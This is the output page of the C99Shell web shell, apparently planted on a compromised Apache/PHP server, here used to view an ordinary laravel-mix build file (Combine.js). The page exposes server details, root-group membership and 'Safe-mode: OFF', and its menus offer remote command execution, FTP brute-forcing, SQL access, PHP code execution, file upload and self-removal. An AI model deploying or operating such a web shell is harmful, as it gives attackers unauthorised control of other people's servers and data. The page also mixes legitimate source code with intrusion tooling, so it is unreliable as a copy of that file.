!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/inventory.picotech.app/public_html/node_modules/laravel-mix/src/components/   drwxr-xr-x
Free 28.19 GB of 117.98 GB (23.89%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Combine.js (2.05 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
const File = require('../File');
const Assert = require('../Assert');
const ConcatFilesTask = require('../tasks/ConcatenateFilesTask');
const { Component } = require('./Component');
const { concat } = require('lodash');

module.exports = class Combine extends Component {
    /**
     * The API name for the component.
     */
    name() {
        return ['combine', 'scripts', 'babel', 'styles', 'minify'];
    }

    /**
     * Register the component.
     *
     * @param {string|string[]} src
     * @param {string} [output]
     * @param {boolean} babel
     */
    register(src, output = '', babel = false) {
        // Do we need to perform compilation?
        babel = babel || this.caller === 'babel';

        const sources = concat([], src);
        const hasOutputPath = output !== undefined && output !== '';

        if (hasOutputPath) {
            this.context.addTask(
                this.createTask({
                    src: sources,
                    dst: output,
                    babel
                })
            );

            return;
        }

        if (this.caller !== 'minify') {
            throw new Error(
                `An output file path is required when using mix.${this.caller}()`
            );
        }

        // We've we're minifying an array of files then the output is the same as the input with a .min extension added
        for (const source of sources) {
            this.context.addTask(
                this.createTask({
                    src: source,
                    dst: source.replace(/\.([a-z]{2,})$/i, '.min.$1'),
                    babel
                })
            );
        }
    }

    /**
     * @param {object} param0
     * @param {string|string[]} param0.src
     * @param {string} param0.dst
     * @param {boolean} param0.babel
     */
    createTask({ src, dst, babel }) {
        const output = new File(dst);

        Assert.combine(src, output);

        return new ConcatFilesTask({
            src,
            output,
            babel,
            ignore: [output.relativePath()]
        });
    }
};

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0076 ]--